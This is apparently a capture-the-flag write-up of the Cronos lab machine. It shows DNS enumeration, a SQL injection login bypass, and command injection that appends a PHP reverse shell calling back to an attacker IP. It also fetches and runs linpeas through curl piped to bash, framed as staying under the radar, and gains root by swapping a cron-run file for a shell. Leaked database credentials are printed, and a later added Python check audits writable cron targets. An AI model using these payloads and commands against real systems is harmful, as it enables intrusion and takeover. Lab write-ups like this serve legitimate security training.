Summary
This was a great machine that did not provide anything too challenging or obscure, which I really appreciated. It did, however, test many techniques, from DNS enumeration to SQLi, command injection, and privilege escalation. The DNS enumeration provided us with new targets that were vulnerable to a SQL injection login bypass, from which command injection provided a user shell. From here I escalated to root with a kernel exploit found with "uname -a", as well as a second path of replacing the "artisan" file being continually executed by root.
Tools used
LinPEAS
Processes/techniques
DNS enumeration with dig
Command injection with a reverse shell
Execute linpeas from memory: "curl -s http://<ip>:<port>/linpeas.sh | bash"
Replace file being executed by a cron job with a shell
Recon
Fairly straightforward, with a DNS server and a web server.
Enumeration: DNS
I tried using several DNS enumeration tools without any luck. Generally in HTB you update your /etc/hosts file with the individual box name as the nameserver. So for good practice I eventually added cronos.htb to my /etc/hosts file and re-ran DNS enumeration with many results.
We add all these servers to our /etc/hosts file.
10.129.30.241 admin.cronos.htb ns1.cronos.htb www.cronos.htb cronos.htb
There was little on the main page but the admin page was accepting credentials.
A little SQL injection for the win!
Login with ' OR 1 -- -
With command injection we can use ;command
Reverse shell
I tried bash, netcat and finally php worked. The traceroute command was appended with a reverse shell: 8.8.8.8;code here.
php -r '$sock=fsockopen("10.10.14.120",6363);exec("/bin/sh -i <&3 >&3 2>&3");'
We find creds in the landing folder for a DB
admin
kEjdbRigfBHUREiNSDs
This led me nowhere, so we proceeded to enumeration.
Privilege escalation
From here we use the usual linpeas to enumerate the target system. In order to remain under the radar we will execute linpeas from memory instead of from the HDD.
curl -s http://10.10.14.120:8000/linpeas.sh | bash
I noticed this while scrolling through linpeas, and it looks promising according to linpeas, as per the "highlighted in yellow" and the fact that root is running something from a user folder on a schedule.
I attempted to edit the artisan file and after some time I had no luck. So I eventually deleted it and copied a PHP reverse shell into its location under the same name, and this gave me root access.
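Replacing a file by deleting and recreating it normally needs write access to its parent directory rather than to the file, so an audit for this finding has to check both. The following is an added example, not part of the original write-up: a small check that reads a system-format crontab and reports files run by root that another account could modify or replace. The function names, the sample crontab line and the temp-dir paths are constructed for illustration.

```python
import os
import shlex
import stat
import tempfile

def risky_cron_targets(crontab_text, run_as="root", trusted_uid=0):
    """Return (path, reason) for each file a `run_as` job references that an
    account other than trusted_uid could modify or replace."""
    findings = []
    for line in crontab_text.splitlines():
        fields = line.split(None, 6)  # m h dom mon dow user command
        if line.lstrip().startswith("#") or len(fields) < 7 or fields[5] != run_as:
            continue
        try:
            tokens = shlex.split(fields[6])
        except ValueError:  # unbalanced quotes: fall back to whitespace split
            tokens = fields[6].split()
        for path in tokens:
            if not (path.startswith("/") and os.path.isfile(path)):
                continue  # only absolute paths to existing regular files
            # Deleting and recreating a file needs write access to its
            # directory, not to the file, so check both.
            for target, kind in ((path, "file"), (os.path.dirname(path), "directory")):
                st = os.stat(target)
                if st.st_uid != trusted_uid:
                    findings.append((path, f"{kind} owned by uid {st.st_uid}"))
                elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                    findings.append((path, f"{kind} is group/world writable"))
    return findings

def demo():
    """Constructed sample: a root job pointing into a directory that was left
    world-writable. Paths live in a temp dir; nothing on the host is read."""
    workdir = tempfile.mkdtemp()
    script = os.path.join(workdir, "artisan")
    with open(script, "w") as fh:
        fh.write("<?php // placeholder scheduled task\n")
    os.chmod(script, 0o644)
    os.chmod(workdir, 0o777)  # the misconfiguration being detected
    crontab = f"# constructed sample\n* * * * * root php {script} schedule:run >> /dev/null 2>&1\n"
    # trusted_uid is the current user here only so the demo runs unprivileged;
    # on a real host leave it at 0.
    return risky_cron_targets(crontab, trusted_uid=os.getuid())

if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

The check covers only absolute paths in the five-field-plus-user crontab format; jobs that `cd` into a directory and use a relative path need the working directory resolved first.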
There was also a kernel exploit that could have been identified with uname -a.